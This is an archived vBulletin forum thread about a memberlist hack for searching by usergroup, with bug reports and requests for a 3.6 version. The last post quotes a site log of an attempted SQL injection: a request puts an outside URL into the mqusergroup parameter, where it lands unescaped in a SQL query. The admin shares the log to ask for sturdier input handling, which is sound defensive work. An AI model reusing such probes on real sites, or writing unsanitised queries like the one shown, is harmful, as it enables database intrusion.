vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin 3.0 Full Releases (https://vborg.vbsupport.ru/forumdisplay.php?f=33)
-   -   [VB3 RC3] Search by usergroup in memberlist (https://vborg.vbsupport.ru/showthread.php?t=60420)

commTRU 08-26-2005 12:14 PM

Quote:

Originally Posted by DeMiNe0
i did all the file edits, and even reedited it, but when i search a usergroup i get the following:

The usergroup you are searching for was not found

even if i directly link to the usergroup ID i get the same. running vb 3.0.3

I had that same problem too. Its because I had edited my user group title to have bold tags surrounding them. Try copying the exact text straight from the title field when you edit your usergroup and see if that works.

cashpath, to make the group not joinable you would need to edit the usergroup settings and set the 'Public (Joinable) Custom Clubs' setting to No.

Thanks very much for this hack, it'll prove very useful to me :)

top end ms 09-28-2006 12:13 AM

If you could get this to work for VB 3.6 that would be AWESOME!

DarkDraco07 11-26-2006 11:19 PM

yea i need this for 3.6 as well

sarahk 02-13-2007 01:21 AM

This is actually really easy in 3.6 - I've been able to do everything via the Plugin Manager. Only outstanding issue is how to do the page navigation ... see http://www.vbulletin.com/forum/showthread.php?t=220020

I'll post the actual plugins once I've got it finished if anyone is interested.

sarahk 04-11-2008 11:02 PM

We've just had an attempt a sql injection targetted at this plugin

Quote:

SELECT COUNT(*) AS users
FROM vb_user AS user
LEFT JOIN vb_userfield AS userfield USING (userid)

WHERE 1=1 AND ( concat( ',', user.membergroupids, ',') like '%,http://phonefamily.chat.ru/images?,%' || user.usergroupid = http://phonefamily.chat.ru/images?)
AND user.usergroupid IN (-1,6,34,7,2,33,38,5);

MySQL Error : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://phonefamily.chat.ru/images?)
AND user.usergroupid IN (-1,
Error Number : 1064
Date : Saturday, April 12th 2008 @ 03:31:03 AM
Script : http://www.mysite.com/forum/memberlist.php?mqusergroup=http://phonefamily.chat.ru/images?
Referrer :
IP Address : 203.97.120.149
Username : Unregistered
Classname : vb_database
didn't work but could the variable management be more robust?


All times are GMT. The time now is 12:15 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01092 seconds
  • Memory Usage 1,728KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (5)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete